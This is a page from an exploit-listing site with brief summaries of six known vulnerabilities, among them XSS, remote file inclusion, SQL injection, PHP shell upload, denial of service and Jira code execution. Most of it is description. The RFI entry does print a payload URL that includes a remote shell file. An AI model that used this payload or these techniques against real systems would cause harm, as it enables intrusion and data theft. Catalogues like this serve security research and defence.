header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

WordPress Plugin Ninja Forms 3.3.17 – Cross-Site Scripting

The Wordpress Plugin Ninja Forms version 3.3.17 is vulnerable to Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious script code into the affected URLs. This can lead to the execution of arbitrary code or the disclosure of sensitive information to the attacker.

Remote File Inclusion in phpFaber.URLInn.v2.0.5.PHP.NULL-DGT

This vulnerability allows an attacker to include remote files in the vulnerable file /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php. The exploit URL is http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?. The vulnerability occurs due to the presence of the vulnerable variable dir_ws in the code at line number 78.

miniBB 2.1 (table) Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on miniBB 2.1. By manipulating the 'table' parameter in the URL, an attacker can inject SQL code into the query, potentially leading to unauthorized access to the database and disclosure of usernames and passwords. The exploit includes a proof of concept URL.

ProfileCMS v1.0 Shell Upload Exploit

This exploit allows an attacker to upload a PHP shell instead of an image while creating a profile on ProfileCMS v1.0. The vulnerable script can be found at http://slrate.com/profiles. By exploiting this vulnerability, an attacker can gain unauthorized access to the system and execute arbitrary commands.

Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)

The exploit causes a denial of service in Bosch Video Management System 8.0 Configuration Client by causing it to crash. This is achieved by opening the Configuration Client and inputting a specific set of values in the fields. The exploit is executed through a Python script that generates a specific payload and saves it in a file called 'bosch.txt'. When this file is copied into the Configuration Client, it causes the program to crash.

Atlassian Jira Authenticated Upload Code Execution

This module can be used to execute a payload on Atlassian Jira via the Universal Plugin Manager(UPM). The module requires valid login credentials to an account that has access to the plugin manager. The payload is uploaded as a JAR archive containing a servlet using a POST request against the UPM component. The check command will test the validity of user supplied credentials and test for access to the plugin manager.

Recent Exploits: